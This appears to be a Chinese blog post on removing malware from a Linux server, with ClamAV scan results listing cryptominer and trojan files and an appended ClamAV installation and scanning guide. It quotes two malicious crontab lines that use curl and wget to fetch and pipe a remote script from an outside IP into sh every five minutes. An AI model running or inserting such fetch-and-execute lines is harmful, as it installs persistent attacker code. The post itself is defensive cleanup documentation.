手机站 | 电信站 | 联通站|联系电话:18925583550

linux下的病毒处理

 linux下的病毒处理
 
安装clamav, 后附安装参考
扫描病毒需要很长时间,把结果存到日志文件里/root/m176_net_log/2018_6_22,有空再回来查看。
 
#/usr/local/clamav/bin/clamscan -ri /.  > /root/m176_net_log/2018_6_22 
 
扫描结果
/./tmp/phpfYADv2: Win.Trojan.Hide-1 FOUND
/./tmp/imWBR1.ig: Multios.Trojan.CryptocoinMiner-6448864-1 FOUND
/./tmp/AnXqV: Unix.Malware.Agent-1843238 FOUND
/./tmp/2t3ik: Multios.Trojan.CryptocoinMiner-6448864-1 FOUND
/./tmp/2t3ik.s: Multios.Trojan.CryptocoinMiner-6448864-1 FOUND
/./tmp/2t3ik20180411: Multios.Trojan.CryptocoinMiner-6448864-1 FOUND
/./tmp/2t3ik.p: Multios.Trojan.CryptocoinMiner-6448864-1 FOUND
/./tmp/ddg.1010: Unix.Malware.Agent-6333905-0 FOUND
/./tmp/wnTKYg: Unix.Malware.Agent-6331814-0 FOUND
/./tmp/ddg.1007: Unix.Malware.Agent-6317965-0 FOUND
 
 
确实问题
 
#crontable -l
 */5 * * * * curl -fsSL http://182.254.221.254:8000/i.sh | sh
 */5 * * * * wget -q -O- http://182.254.221.254:8000/i.sh | sh
 
目前http://182.254.221.254:8000/i.sh 已经打不开了,看不到内容
 
#vi /var/spool/cron/root
#vi /var/spool/cron/crontabs/root
删除上述内容
 
重启定时任务
#service crond restart
 
再检查任务,确认已经没有定时任务了。
#crontable -l
 
修改/tmp 下有病毒的文件权限,仅开放root用户读写
#cd /tmp
#chmod 300 *
 
 
观察....
 
 
 
 
附:安装clamav
http://haibing.org/?p=274
 
最近发现有台服务器中毒了,手动去查杀总是会有遗漏,最后安装了Linux下的杀毒软件clamav,使用起来还是不错的。
 
环境:
Linux 6.8
版本:
clamav-0.99.2.tar.gz
依赖关系:
yum install pcre* zlib zlib-devel libssl-devel libssl
openssl version 0.9.8 or higher
 
一.安装clamav
有两种方法安装:
1.yum安装
用epel源进行安装,但是需要连网才行(不过能中毒的也一般都是有外网的)
安装后会自动生成服务文件,启动服务后,可使用clamdsacn命令,扫描速度快。
启动服务后,会实时监控扫描连接,虽然安全性高了,不过可能会对服务器性能有影响。
 
下载安装epel.repo文件
linux6和7通用,6会提示找不到一些组件
 
#yum install clamav  clamav-server clamav-data clamav-update clamav-filesystem clamav-scanner-systemd clamav-devel clamav-lib clamav-server-systemd
这种方法安装后,病毒库默认地址是/var/lib/clamav
 
2.源码安装
需要手动编译安装,安装虽然不需要连网,但更新病毒库还是需要联网
安装后不用启动服务,不能使用clamdsacn命令,可使用clamscan命令,扫描速度相对较慢
 
官网下载clamav
 
#tar zxvf clamav-0.99.2.tar.gz
#cd clamav-0.99.2
#要带pcre,要不然执行clamscan会报错
#./configure --prefix=/usr/local/clamav  --with-pcre
#make
#make install
 
配置文件(yum安装的话大部分步骤可以省略,会自动创建)
 
#cd /usr/local/clamav/etc/
#cp clamd.conf.sample clamd.conf
#cp freshclam.conf.sample freshclam.conf
注释掉clamd.conf和freshclam.conf中的
# Example 注释掉这一行. 第8 行
#创建用户,创建存放病毒库目录
 
 
# useradd clamav -s /sbin/nologin
# mkdir -p /usr/local/clamav/share/clamav
# chown clamav:clamav /usr/local/clamav/share/clamav
 
二、更新病毒库
执行更新命令,下载病毒库
# /opt/clamav/bin/freshclam
 
一般都下载不了
可以wget到本地来
 
#cd /usr/local/clamav/share/clamav
#wget http://database.clamav.net/main.cvd
#wget http://database.clamav.net/daily.cvd
#wget http://database.clamav.net/bytecode.cvd
 
# chown clamav:clamav  *
三、命令扫描
clamav有两个命令:clamdscan、clamscan
clamdscan命令一般用yum安装才能使用,需要启动clamd服务,执行速度快
clamscan命令通用,不依赖服务,命令参数较多,执行速度稍慢
 
clamdscan:
 
 
#service clamd start
用clamdscan扫描,需要开始服务才能使用。速度快,不用带-r,默认会递归扫描子目录
#clamdscan /usr
clamscan:
用clamscan扫描,不需要开始服务就能使用。速度慢,要带-r,才会递归扫描子目录
 
#clamscan -r /usr
这个命令不仅会显示找到的病毒,正常的扫描文件也会显示出来。
可以用下面这个命令,只显示找到的病毒信息
 
 
# clamscan --no-summary -ri /tmp
-r 递归扫描子目录
-i 只显示发现的病毒文件
--no-summary 不显示统计信息
可以写个脚本,用这句命令定期扫描,有返回值即触发告警。
 
分享到:

热门关注